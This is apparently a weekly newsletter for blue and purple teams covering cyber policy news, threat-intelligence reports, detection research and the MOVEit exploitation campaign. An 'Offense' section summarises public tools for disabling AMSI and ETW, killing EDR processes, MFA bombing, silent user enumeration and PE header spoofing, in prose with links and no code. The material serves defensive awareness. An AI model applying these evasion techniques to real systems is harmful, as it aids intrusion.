Bluepurple Pulse: week ending June 11th
Discover more from Cyber Defence Analysis for Blue & Purple Teams
Bluepurple Pulse: week ending June 11th
They like to MOVEit MOVEit... they like to MOVEit!
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week has mostly been centered around the at scale exploitation of MOVEit and the resulting consequences. I commented to someone that it shouldn’t be a surprise that such vulnerabilities can be found and exploited by organized crime in 2023 when you see what a small offensive team in the private sector is capable of.
In the high-level this week:
Trump White House Aides Subpoenaed in Firing of Election Security Expert - The investigators appear focused on Mr. Trump’s state of mind around the firing of Mr. Krebs.
Twenty-Five Years of White House Cyber Policies - The incentives that the market provides are the first choice for addressing the problem of critical infrastructure protection; regulation will be used only in the face of a material failure of the market to protect the health, safety or well-being of the American people.
Netherlands government wants to abandon key safeguards for hacking of non-targets - In the new situation, hacking, targeted interception and data access operations get an automatic extension beyond the actual target of the warrant. If a warrant is requested to intercept the communications of a specific hacking organization, the warrant now also extends to victims of this hacking group.
The United States and Ukraine met on June 1, 2023, in Tallinn, Estonia to reconvene the U.S.- Ukraine Cyber Dialogue, an annual discussion on cyber policy issues - the United States is working with Congress to deliver an additional $37 million in cyber assistance to Ukraine, which would bring the total to $82 million since February 2022, and over $120 million since 2016.
China is colonising Africa’s internet - Afrinic currently has no CEO and is unable to constitute a board. Its bank accounts are frozen, and its staff are currently being paid through an emergency fund set up by the other regional internet registries… the collapse is due almost entirely to a Hong Kong businessman who found and exploited weaknesses in the organisation and who, observers fear, has the support of the Chinese government.
The (French) Senate gives the green light to the remote activation of the cameras or microphones of the telephones - provision of the justice bill authorizing the remote triggering of cameras or telephone microphones in certain investigations, without the knowledge of the persons concerned.
Cross-border access (EU) to electronic evidence - During the June plenary session, the Parliament is expected to vote on the trilogue agreement reached with the Council on two Commission proposals revolutionising cross-border access to electronic evidence across the EU
NATO Review - NATO and strategic competition in cyberspace - One avenue for NATO to pursue is to strengthen and redefine its international partnerships in this policy field. While there is more talk of the partners in the Indo-Pacific region (Japan, South Korea, Australia and New Zealand) in NATO’s Strategic Concept, there are opportunities to further develop these as global partnerships for cybersecurity.
Revising Public-Private Collaboration to Protect U.S. Critical Infrastructure - makes 12 recommendations on which is really easy to say - Identify a more effective way to catalog, support, and protect priority infrastructure. - but hard to do in practice.
U.S. and ROK Agencies Cybersecurity Alert: The Democratic People’s Republic of Korea (DPRK) Social Engineering Campaigns Targeting Think Tanks, Academia, and News Media - Kimsuky, a set of DPRK cyber actors, conducts large-scale social engineering campaigns in which victims at think tanks, academic institutions, and news outlets are manipulated and compromised for the purpose of intelligence gathering.
Treasury Sanctions Iranian Company Aiding in Internet Censorship - the Iran-based technology company known as “Arvan Cloud,” two senior employees of Arvan Cloud, and an affiliated company based in the United Arab Emirates for their roles in facilitating the Iranian regime’s censorship of the Internet in Iran.
A Confession Exposes India’s Secret Hacking Industry - The hacking-for-hire business has prospered in India for some of the same reasons that I.T. outsourcing has: an abundance of inexpensive skilled labor in an open marketplace readily accessible to Western clients. But Indian hackers are also unusually brazen, with competing firms publicly touting “ethical” or “white hat” hacking services, and individual hackers bragging on LinkedIn about their spear phishing.
$35 Million Atomic Wallet Hacker Funnels Crypto to North Korea’s Favored Mixer - traced funds from the $35 million Atomic Wallet hack to Sinbad.io, a mixer used to launder over $100 million in cryptoassets stolen by North Korea’s Lazarus Group.
Secure by Design – a new way to manage cyber risk in capabilities - by Christine Maxwell who is the Director for Cyber at the UK’s Ministry of Defence.
Japan targeted by Chinese propaganda and covert online campaign - The Chinese Communist Party is ramping up a multi-year propaganda and covert social media campaign focusing on Japan’s plans to release wastewater from the earthquake-stricken Fukushima Daiichi nuclear power plant
All Quiet on the Cyber Front? Explaining Russia’s Limited Cyber Effects - Zhora suggested that some key Russian accesses to Ukrainian networks were compromised before the February 2022 invasion. This denied Russia the ability to leverage these to deliver cyber operations. - in short Hunt Forward worked.
UK’s CDEI portfolio of AI assurance techniques - The portfolio is useful for anybody involved in designing, developing, deploying or procuring AI-enabled systems, and showcases examples of AI assurance techniques being used in the real-world to support the development of trustworthy AI - notable cyber gap.
Singapore launches AI Verify Foundation to shape the future of international AI standards through collaboration - The Foundation will look to boost AI testing capabilities and assurance to meet the needs of companies and regulators globally.
The reflections this week come considering what the future holds for cyber resilience at national levels all the way down to the technological. It is increasingly clear we will continue to have breaches of all sizes and impact no matter what we do. That is we might reduce their likelihood, but we can’t and won’t stop in for a variety of increasingly complex reasons. The net result I suggested is there is significant value of ‘blast radius minimization’. If we assume breach (as we have for a while) how do we minimize possible impact. Arguably ZeroTrust is a nod to this by removing the implied trust on an ‘internal’ network. But there is clearly massive opportunity here to do a whole lot more…
On the interesting job/role front:
UK Department for Science, Innovation and Technology Secondee Opportunities - incudes the cyber directorate
Defence Digital – Cyber Security Awareness Deputy Head at the UK’s MoD
Deputy Director, Strategic Analysis and Assurance at the UK’s Department for Science, Innovation and Technology
Head of the Digital Pound Project - at the UK’s Bank of England
Software Security Researcher - Browser & Userland - Apple in the UK
Enjoying this? don’t get via e-mail? Subscribe:
Think someone else would benefit? Share:
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia
UAC-0099: cyberespionage against state organizations and media representatives of Ukraine
Reporting from Ukraine on Russian government activity which is a stealer and the use of TOR as an obfuscation network.
malicious programs "THUMBCHOP" (stealer for Chrome and Opera), "CLOGFLAG" (keylogger), as well as TOR and SSH can be downloaded to the affected computer to create a hidden service and/or build a reverse connection and, in this way , creating prerequisites for interactive unauthorized remote access to a computer. The incident response also uncovered samples of malware developed using the Go programming language, namely: SEAGLOW and OVERJAM
https://cert.gov.ua/article/4818341
RomCom Resurfaces: Targeting Politicians in Ukraine and U.S.-Based Healthcare Providing Aid to Refugees from Ukraine
Building on the reporting last week of this threat actor and their pivot to state aligned activity. The fact that humanitarian support is being targeted is of note.
The RomCom threat actor has been carefully following geopolitical events surrounding the war in Ukraine, targeting militaries, food supply chains, and IT companies. In RomCom’s latest campaign [we] observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine
North Korea
I’ve omitted some of the tactical reporting this week as there was simply so much. It is all on the Subreddit is you want it.
North Korea Using Social Engineering to Enable Hacking of Think Tanks, Academia, and Media
Tell us you have/had access to threat actors infrastructure without telling us.
https://www.ic3.gov/Media/News/2023/230601.pdf
North Korea-Aligned TAG-71 Spoofs Financial Institutions in Asia and US
North Korea continuing to appear to be after financial instruments. The tradecraft is as you would expect i.e. maldocs using a variety of obfuscation and exploitation techniques (e.g. template injection).
[We] discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. The group responsible, referred to as Threat Activity Group 71 (TAG-71), has significant overlaps with the North Korean state-sponsored APT38. Between September 2022 and March 2023, [we] discovered 74 domains and 6 malicious files associated with TAG-71's activities.
https://www.recordedfuture.com/north-korea-aligned-tag-71-spoofs-financial-institutions
https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf
ITG10 Likely Targeting South Korean Entities of Interest to the Democratic People's Republic of Korea (DPRK)
Joshua Chung Melissa Frydrych Claire Zaboeva and Agnes Ramos-Beauchamp detail a phishing campaign like a lot of others we report on week in and week out. The point of note here is the victimology.
ITG10 likely targeting South Korean government, universities, think tanks, and dissidents
Phishing emails spoof legitimate senders to deliver RokRAT via LNK files
Email attachments mimic legitimate documents
Additional malware samples possibly related to ITG10 RokRAT campaigns
https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/
Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence
Aleksandar Milenkoski details further Hermit Kingdom activity and builds on various bits of tradecraft reporting we have covered over the last few months (years?). Noting that their reconnaissance is evolving / getting stronger.
[We have] been tracking a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
The campaign has the objective of stealing Google and subscription credentials of a reputable news and analysis service focusing on North Korea, as well as delivering reconnaissance malware.
Kimsuky engages in extensive email correspondence and uses spoofed URLs, websites imitating legitimate web platforms, and Office documents weaponized with the ReconShark malware.
This activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
"Professor, please comment"... North Korean hacker organization 'Kim Soo-ki' attempts to hack 150 security experts
Yujin Lee provides reporting on a scaled campaign by the Hermit Kingdom across those who may have policy influence towards North Korea.
The National Investigation Headquarters of the National Police Agency announced on the 7th that after investigating the case of malicious e-mails sent to key officials in the field of diplomacy and security, it was confirmed that a specific hacking organization was carried out by North Korea.
According to the police, from April to August of last year, Suki Kim sent malicious e-mails to 150 South Korean diplomacy and security experts, inducing them to access phishing sites. They attempted a natural approach by sending an e-mail asking for opinions on the booklet or thesis.
China
Chinese Threat Actor Used Modified Cobalt Strike Variant to Attack Taiwanese Critical Infrastructure
Arda Büyükkaya detailed an interesting customization to Cobalt Strike here by a Chinese threat actor in an attempt to avoid detection.
[We] identified a malicious web server very likely operated by a Chinese threat actor used to target Taiwanese government entities, including critical infrastructure.
The threat actor primarily focused on exploiting four different remote code execution (RCE) vulnerabilities to target web services and heavily relied on open-source tools, some of which are exclusively available in Chinese underground forums. The threat actor also engaged in brute-forcing against the victim's internal web services.
Malware Spotlight: Camaro Dragon’s TinyNote Backdoor
Interesting insight here into a Chinese state actor and their capability to bypass a regional EDR solution. Also of note that this threat intelligence collection activity would not be possible from the UK due to the Computer Misuse Act by the fact they were protected by HTTP basic authentication, even though it was with a known password.
Since early January 2023, there has been a notable surge in activity targeting European foreign affairs entities linked to Southeast and East Asia. The threat actors responsible are tracked by [us] as Camaro Dragon and are associated with a broad network of espionage operations aligned with Chinese interests. Camaro Dragon overlaps with previously reported activities conducted by state-sponsored Chinese threat actors, namely Mustang Panda.
A previously unknown Go-based backdoor called TinyNote was found on one of the Camaro Dragon distribution servers, in addition to being spotted in the wild. The malware samples also communicate with other known C&C servers attributed to Camaro Dragon.
The TinyNote backdoor is distributed with names related to foreign affairs matters, and likely targets Southeast and East Asian embassies.
The backdoor performs a bypass of the Indonesian antivirus SmadAV, a security tool popular in Southeast Asian countries, such as Myanmar and Indonesia, and apparently used by a subset of the campaign targets.
The TinyNote backdoor is a first-stage malware only capable of basic machine enumeration and command execution via PowerShell or Goroutines. However, it focuses on redundancy to gain a foothold on the infected machine, including setting up multiple persistency tasks, communication with several different C&C servers, and different types of C&C command execution.
..
When we investigated a few delivery servers related to Camaro Dragon, we discovered that one of them exposed the threat actors’ tools and files located on the server, only protected by basic HTTP Authorization with a known password.
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/
Iran
Iran Cyber Threat Overview
Maxime ARQUILLIÈRE provides an overview of the Iran state threat actor nexus. Useful for those trying to orientate themselves on the topic.
Understanding and contextualising cyber malicious activities associated with Iran-nexus intrusions sets over the 2022-2023 period. It does not establish an exhaustive list of campaigns or reported intrusion sets, but rather offer a strategic analysis pertaining to the Iranian cyber threat. Information cut-off date is 5 May 2023.
https://blog.sekoia.io/iran-cyber-threat-overview/
Stealth Soldier Backdoor Used in Targeted Espionage Attacks in North Africa
Discuss if this is the Egyptian state or someone else interested in the region.
[We] observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor.
Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.
The Stealth Soldier infrastructure has some overlaps with infrastructure the The Eye on the Nile which operated against Egyptian civilian society in 2019. This is the first possible re-appearance of this threat actor since then.
The newest version of the backdoor we found was Version 9, likely delivered in February 2023. The oldest version we found was Version 6, compiled in October 2022.
There are indications that the malware C&C servers are related to a larger set of domains, likely used for phishing campaigns. Some of the domains masquerade as sites belonging to the Libyan Foreign Affairs Ministry.
Sidecopy’s recent activity analysis of FetaRAT, a new backdoor issued by Indian defense and military departments
Chinese reporting on a Pakistani threat actor who continued to target the Indian state. The fact they are inspired tradecraft wise by the country they are targeting shows the real tit-for-tat nature here.
The loader samples captured this time are all hosted on the website of an Indian translation company;
The captured samples are mainly aimed at Indian defense and military;
The attack method in the initial stage of the activity is still mainly to imitate Sidewinder, and a new C# backdoor Trojan horse will be released later. We named it FetaRAT. The main functions of the backdoor include network connection, information acquisition, file upload, screenshot upload, audio playback, etc. .
New Magecart-Style Campaign Abusing Legitimate Websites to Attack Others
Roman Lvovsky details a criminal campaign which is doing web skimming. The sooner we mitigate this class of threat within our financial systems arguably the better.
[We] have discovered and analyzed a new ongoing Magecart-style web skimmer campaign, designed to steal personally identifiable information (PII) and credit card information from digital commerce websites.
Victims have been identified in North America, Latin America, and Europe, and they range in size. Some victims are estimated to handle hundreds of thousands of visitors per month, potentially putting tens of thousands of shoppers’ PII and credit cards at risk of being stolen and abused or sold on the dark web.
Attackers employ a number of evasion techniques during the campaign, including obfuscating Base64 and masking the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager.
Notably, attackers “hijack” legitimate websites to act as makeshift command and control (C2) servers. These “host victims” act as distribution centers for malicious code, unbeknownst to the victim, effectively hiding the attack behind a legitimate domain.
This attack includes the potential for exploitation of websites built using Magento, WooCommerce, WordPress, and Shopify, demonstrating the growing variety of vulnerabilities and abusable digital commerce platforms.
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
When hackers hack the hackers
The interesting point here is that it was signed with a certificate from what appears to be a legitimate Chinese electronics company. The threat intel researchers got access to the Discord server being used for the C2 and thus could see all the commands executed against the victims (again not legal to the do from the UK). The fact a malicious Visual Studio project was used for initial access is of note.
[We] had the opportunity to observe the execution of non-standard processes in a sandbox-like, isolated virtual machine (VM). Further analysis of these processes revealed Command & Control (C2) connections using Discord for communication. As we continued to analyse the C2 agent, we also gained access to the attacker's Discord channel and were able to take a look at all the commands and modules executed for many more compromised systems. This attacker/group was very different to the ones we typically see while doing Incident Response for our customers in terms of the motivation and goals. It seemed, that this attacker was mainly compromising Malware developers and or Offensive Security related people to steal and sell code from the target systems.
https://www.r-tec.net/r-tec-blog-when-hackers-hack-the-hackers.html
Android apps containing SpinOk module with spyware features installed over 421,000,000 times
This makes the mobile eco-system just sound like Mos Eisley. The scale here is of note..
Upon initialization, this trojan SDK connects to a C&C server by sending a request containing a large amount of technical information about the infected device. Included are data from sensors, e.g., gyroscope, magnetometer, etc., that can be used to detect an emulator environment and adjust the module’s operating routine in order to avoid being detected by security researchers. For the same purpose, it ignores device proxy settings, which allows it to hide network connections during analysis. In response, the module receives a list of URLs from the server, which it then opens in WebView to display advertising banners.
this trojan SDK expands the capabilities of JavaScript code executed on loaded webpages containing ads. It adds many features to such code, including the ability to:
obtain the list of files in specified directories,
verify the presence of a specified file or a directory on the device,
obtain a file from the device, and
copy or substitute the clipboard content
https://news.drweb.com/show/?i=14705&lng=en
Not your average Joe
A low grade criminal actor who has been active for 10 years!
XeGroup is a hacking group that has been active since at least 2013. The group is believed to have been involved in various cybercriminal activities. This threat actor uses many different attack techniques including:
Supply chain attacks similar to Magecart, that inject credit card skimmers into web pages.
Creating fake websites to deceive users into revealing their personal information.
Selling stolen data on the dark web.
Discovery
How we find and understand the latent compromises within our environments.
Windows.Detection.MoveIt
Matthew Green et al provide these Velociraptor to detect exploitation of a MoveIt critical vulnerability observed in the wild for Velociraptor
https://docs.velociraptor.app/exchange/artifacts/pages/moveit/
https://docs.velociraptor.app/exchange/artifacts/pages/moveitevtx/
DeepEAD: Explainable Anomaly Detection from System Logs
Xinda Wang, Kyeong Jin Kim, Ye Wang, Toshiaki Koike-Akino, and Kieran Parsons present some promising research here to detect high signal anomalies.
In this paper, we develop an attention-equipped encoderdecoder system to capture context from system logs for explain- able anomaly detection. For each target event, we collect its nearby events in chronological order as its context events. Instead of using a recurrent neural network-based encoder like previous works, we adopt a Transformer-based encoder to extract complex relations among context events and their attributes.
Evaluation on the large-scale real-world Los Alamos National Laboratory dataset shows that, compared with existing works, our methods can provide fine- grained one-to-one attention to help explain the importance of each attribute in the context events to the prediction, without sacrificing detection performance.
https://merl.com/publications/docs/TR2023-050.pdf
Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks
Joe Desimone, Samir Bousseaden and Gabriel Landau continue to up the Windows detection tradecraft game.
Call stacks are a powerful data source that can be used to improve protection against non-memory-based threats as well. For example [our] queries look for the creation of a child process or an executable file extension from an Office process with a call stack containing VBE7.dll (a strong sign of the presence of a macro-enabled document). This increases the signal and coverage of the rule logic while reducing the necessary tuning efforts compared to just process or file creation events with no call stack information.
Defence
How we proactively defend our environments.
Connecting Sigma Rule Sets to your Environment with Processing Pipelines
Thomas Patzke brings some exquisite engineering to the detection problem space.
A processing pipeline defined a sequence of transformations that are applied to a Sigma rule before it is converted into the target query language. These transformations can be field mappings, adding suffixes to field names and many other. In addition, conditions can be attached to a transformation. E.g. a transformation can only be applied for particular fields or if a former transformation was applied. A transformation with its conditions and an optional identifier form together a processing item.
Processing pipelines can be expressed by a YAML file or as Python code.
EnableWindowsLogSettings
This is older, but we had not covered and doing so was worthwhile. It is documentation and scripts to properly enable Windows event logs.
https://github.com/Yamato-Security/EnableWindowsLogSettings
Vulnerability
Our attack surface.
Supply Chain Risk from Gigabyte App Center Backdoor
This was pretty material as an attack surface.
[We] detected firmware on Gigabyte systems that drops an executable Windows binary that is executed during the Windows startup process.
This executable binary insecurely downloads and executes additional payloads from the Internet.
https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
The Unseen Risks of Open Source Dependencies: The Case of an Abandoned Name
The fragility of the eco-system coupled with a world of M&A and other company lifecycle events make the likelihood of such incidents by bother opportunistic as well as persistent threat actors a real risk.
‘gemnasium-gitlab-service‘ was one such gem, originally developed by Gemnasium and taken over and maintained by GitLab when they acquired Gemnasium. However, GitLab decided to retire this gem a while ago and move away from its usage in the GitLab software.
Normally, such a decision would not cause any significant issues. Developers relying on the gem would either stick with the last available version or migrate to an alternative over time.
However, in the case of ‘gemnasium-gitlab-service‘, our research team discovered an unidentified entity scanning registries and code sources for references to packages that had names available for takeover in various registries.
The threat actor noticed that this gem had been removed and took the opportunity to take over the gem’s name. This person or group then published a new gem under the ‘gemnasium-gitlab-service‘ title.
Offense
Attack capability, techniques and trade-craft.
LightsOut
Matthew David releases tooling which generate an obfuscated DLL that will disable AMSI & ETW. In use by threat actors in 3..2..
LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).
https://github.com/icyguider/LightsOut
MFA Bombing Tools for Okta
Avi Aminov et al release a tool to highlight the need for their solution. Content led marketing at its finest..
MFA Bomber: [Red Team] This tool bombards a user with MFA push prompts until the user approves one of them. The tool works with Okta and requires a valid username and password.
MFA Bombing Tester: [Purple Team] This tool scans an Okta organization for all users with push MFA prompts configured and triggers them to see who approves. The tool interacts with the Okta API using a token, so it doesn't require a Chrome driver to function.
https://github.com/authomize/mfa-bombing
ZipJar, a little bit unexpected attack chain
The prophecy comes sort of true from the launch of the .zip gTLD.
The Windows Explorer location bar, is also a search function
If using a TLD, like .zip, the search will be online, if the file does not exist locally on PATH folders
Windows Explorer will happily map a WebDAV folder directly
.jar files circumvent the execution Blocker (untrusted Location), however a JRE must be installed
https://badoption.eu/blog/2023/06/01/zipjar.html
OneDrive to Enum Them All
A technique detailed which means hopefully you weren’t relying on the secrecy of usernames as your defense in depth.
In short, OneDrive can be the best way to do user enumeration because:
It doesn’t require a login attempt
It’s completely silent (companies cannot see the requests)
There’s no rate-limiting
https://www.trustedsec.com/blog/onedrive-to-enum-them-all/
Terminator: Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes
A Moroccan researcher has released as open source a capability which replicates what was being sold on the criminal underground.
Reproducing Spyboy technique, which involves terminating all EDR/XDR/AVs processes by abusing the zam64.sys driver
Spyboy was selling the Terminator software at a price of $3,000
the sample is sourced from loldrivers
https://github.com/ZeroMemoryEx/Terminator
Abusing undocumented features to spoof PE section headers
Matthew continues to inspire with his released. This edge case behavior we can expect to be adopted.
Some time ago, I accidentally came across some interesting behaviour in PE files while debugging an unrelated project. I noticed that setting the
SectionAlignmentvalue in the NT header to a value lower than the page size (4096) resulted in significant differences in the way that the image is mapped into memory. Rather than following the usual procedure of parsing the section table to construct the image in memory, the loader appeared to map the entire file, including the headers, into memory with read-write-execute (RWX) permissions - the individual section headers were completely ignored.
https://secret.club/2023/06/05/spoof-pe-sections.html
Exploitation
What is being exploited.
MOVEit Transfer Transfer Critical Vulnerability (May 2023)
The understatement of the week and whole host of reporting and real-world impact.
Progress has discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment. If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below in order to help protect your MOVEit Transfer environment.
https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft
Initial reporting by an army of analysts here.
Following exploitation of the vulnerability, the threat actors are deploying a newly discovered LEMURLOOT web shell with filenames that masquerade as human.aspx, which is a legitimate component of the MOVEit Transfer software. [We have] observed several POST requests made to the legitimate guestaccess.aspx file before interaction with the LEMURLOOT webshell, indicating SQLi attacks were directed towards that file.
We have observed LEMURLOOT samples with the filenames human2.aspx and _human2.aspx. Various samples with the name human2.aspx were uploaded to VirusTotal beginning on May 28, 2023. Samples of LEMURLOOT have been uploaded to public repositories from several additional countries—including Italy, Pakistan, and Germany—suggesting that UNC4857 has also impacted organizations in these nations.
LEMURLOOT provides functionality tailored to execute on a system running MOVEit Transfer software, including the ability to generate commands to enumerate files and folders, retrieve configuration information, and create or delete a user with a hard-coded name. Initial analysis suggests that the LEMURLOOT web shell is being used to steal data previously uploaded by the users of individual MOVEit Transfer systems.
https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
MOVEit Transfer Exploited to Drop File-Stealing SQL Shell
Alex Delamotte provides further extended reporting on an unreported aspect.
[We have] observed in-the-wild (ITW) exploitation of CVE-2023-34362, a vulnerability in the MOVEit file transfer server application. The attack delivers a Microsoft IIS
.aspxpayload that enables limited interaction between the affected web server and connected Azure blob storage. On June 5, the Cl0p ransomware group claimed responsibility for these attacks, though [we] note the targeting of a file transfer application vulnerability resembles other exploitation conducted by financially motivated actors throughout early 2023.
https://www.sentinelone.com/blog/moveit-transfer-exploited-to-drop-file-stealing-sql-shell/
MOVEit-Transfer: A repository for tracking events related to the MOVEit Transfer Cl0p Campaign
Then there was one repo to rule them all on the topic by the wonderful team at Curated Intel.
A repository for tracking events related to the MOVEit Transfer Hacking Campaign
Events mapped to the Diamond Model, plus resources and information
https://github.com/curated-intel/MOVEit-Transfer
Barracuda Email Security Gateway Appliance (ESG) Vulnerability
The initial report on this last week got worse as they said the appliances now needed physically replacing.
June 6th update - Impacted ESG appliances must be immediately replaced regardless of patch version level. If you have not replaced your appliance after receiving notice in your UI, contact support now
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
pkilint
A framework for verifying PKI structures
pkilint is a linting framework for documents that are encoded using ASN.1. pkilint is designed to be a highly extensible toolbox to quickly create linters for a variety of ASN.1 structure/"document" types to check for compliance with various standards and policies.
https://github.com/digicert/pkilint
fq: jq for binary formats
Mattias Wadman released this work aid of analysts.
fq is inspired by the well known jq tool and language that allows you to work with binary formats the same way you would using jq. In addition it can present data like a hex viewer, transform, slice and concatenate binary data. It also supports nested formats and has an interactive REPL with auto-completion.
ebpfguard5
A Rust library for writing Linux security policies using eBPF
Ebpfguard is a library for managing Linux security policies. It is based on LSM hooks, but without necessity to write any kernel modules or eBPF programs directly. It allows to write policies in Rust (or YAML) in user space.
https://github.com/deepfence/ebpfguard
bin2ml
A command line tool for extracting machine learning ready data from software binaries
bin2mlis a command line tool to extract machine learning ready data from software binaries. It's ideal for researchers and hackers to easily extract data suitable for training machine learning approaches such as natural language processing (NLP) or Graph Neural Networks (GNN's) models using data derived from software binaries.
https://github.com/br0kej/bin2ml
Binder Trace
An IPC sniffer for Android which will help both malware analysts and vulnerability researchers.
Binder Trace is a tool for intercepting and parsing Android Binder messages. Think of it as "Wireshark for Binder".
https://github.com/foundryzero/binder-trace
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Making Sense of Large-scale Cyber Incidents: International Cybersecurity Beyond Threat-based Security Perspectives - The findings reveal a steady development towards an increasingly threat-based security logic in both national and international cyber policy settings. The case studies also highlight the volatile nature of malware proliferation, the tendency of collateral damage from directed cyberattacks, the transboundary characteristics of large-scale cyber incidents, and the central role of civil contingencies actors and the private sector in cybersecurity governance.
Here's what Denmark can teach others about cyber resilience - via the World Economic Forum - I can’t work out the sales angle here.
Cyber-enabled tradecraft and contemporary espionage: assessing the implications of the tradecraft paradox on agent recruitment in Russia and China - This paper considers the utility of cyberspace for espionage recruitment in these two hard target states, and assesses its value as a potential solution to emerging surveillance threats.
Google Secure AI Framework (SAIF) - said in a South London accent.
Delivering Security at Scale: From Artisanal to Industrial - by the venerable Phil Venables.
Fostering Open Source Software Security - Open source software (OSS) is the backbone and driver of digitization across sectors worldwide. This makes OSS a cornerstone of every society and economy, including the core of national security concerns. Therefore, governments have a vested interest in OSS security. At the same time, governments, as large users of OSS, bear some of the responsibility for supporting the OSS ecosystem.
Private Eyes: China’s Embrace of Open-Source Military Intelligence
Cutting Medusa's Path -- Tackling Kill-Chains with Quantum Computing - This paper embarks upon exploration of quantum vulnerability analysis. The example given is to prioritize patches by expressing the connectivity of various vulnerabilities on a network with a QUBO and then solving this with quantum annealing. Such a solution is then proved to remove all kill-chains (paths to security compromise) on a network.
CDEI portfolio of AI assurance techniques - as mentioned with the notable cyber gap.
Quantifying Memorization Across Neural Language Models - Large language models (LMs) have been shown to memorize parts of their training data, and when prompted appropriately, they will emit the memorized training data verbatim. This is undesirable because memorization violates privacy (exposing user data), degrades utility (repeated easy-to-memorize text is often low quality), and hurts fairness (some texts are memorized over others). We describe three log-linear relationships that quantify the degree to which LMs emit memorized training data. Memorization significantly grows as we increase (1) the capacity of a model, (2) the number of times an example has been duplicated, and (3) the number of tokens of context used to prompt the model.
AlphaDev discovers faster sorting algorithms - we introduce AlphaDev, an artificial intelligence (AI) system that uses reinforcement learning to discover enhanced computer science algorithms – surpassing those honed by scientists and engineers over decades.
This newsletter is produced by BinaryFirefly, it is via BinaryFirefly I support a hand picked set of organisations across investment, strategy and capability in the domain of cyber.
For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.
